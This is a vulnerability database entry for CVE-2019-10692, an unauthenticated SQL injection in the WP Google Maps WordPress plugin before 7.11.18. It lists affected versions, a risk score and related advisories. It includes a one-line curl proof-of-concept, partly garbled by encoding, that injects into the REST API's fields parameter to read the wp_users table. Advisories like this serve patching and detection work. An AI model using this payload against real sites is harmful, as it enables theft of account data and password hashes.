Lucene search
WpvulndbWPVDB-ID:475404CE-2A1A-4D15-BF02-DF0EA2AFDAEAHistoryApr 02, 2019 - 12:00 a.m.
WP Google Maps 7.11.00-7.11.17 - Unauthenticated SQL Injection
2019-04-0200:00:00
wpscan.com
12
0.973 High
EPSS
Percentile
99.9%
The includes/class.rest-api.php in the REST API does not sanitize field names before a SELECT statement, leading to an unauthenticated SQL injection issue.
PoC
curl -k --silent “http://example.com/index.php?rest_route=3D/wpgmza/v1/markers/&filter;=3D{}&=fields=3D*+from+wp_users+--+-”
| CPE | Name | Operator | Version |
|---|---|---|---|
| wp-google-maps | lt | 7.11.18 |
Related
cve
cve
CVE-2019-10692
2019-04-02 18:30:20
prion
prion
Design/Logic Flaw
2019-04-02 18:30:00
attackerkb
attackerkb
CVE-2019-10692
2019-04-02 00:00:00
nvd
nvd
CVE-2019-10692
2019-04-02 18:30:20
packetstorm
packetstorm
WordPress Rest Google Maps SQL Injection
2020-10-20 00:00:00
openvas
openvas
WordPress WP Google Maps Plugin < 7.11.18 SQL Injection Vulnerability
2019-04-10 00:00:00
wpexploit
wpexploit
WP Google Maps 7.11.00-7.11.17 - Unauthenticated SQL Injection
2019-04-02 00:00:00
nuclei
nuclei
WordPress Google Maps <7.11.18 - SQL Injection
2022-08-08 13:06:30
checkpoint_advisories
checkpoint_advisories
WordPress Google Maps Plugin SQL Injection (CVE-2019-10692)
2019-07-01 00:00:00
exploitdb
exploitdb
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection
2020-10-20 00:00:00
nessus
nessus
cvelist
cvelist
CVE-2019-10692
2019-04-02 17:37:16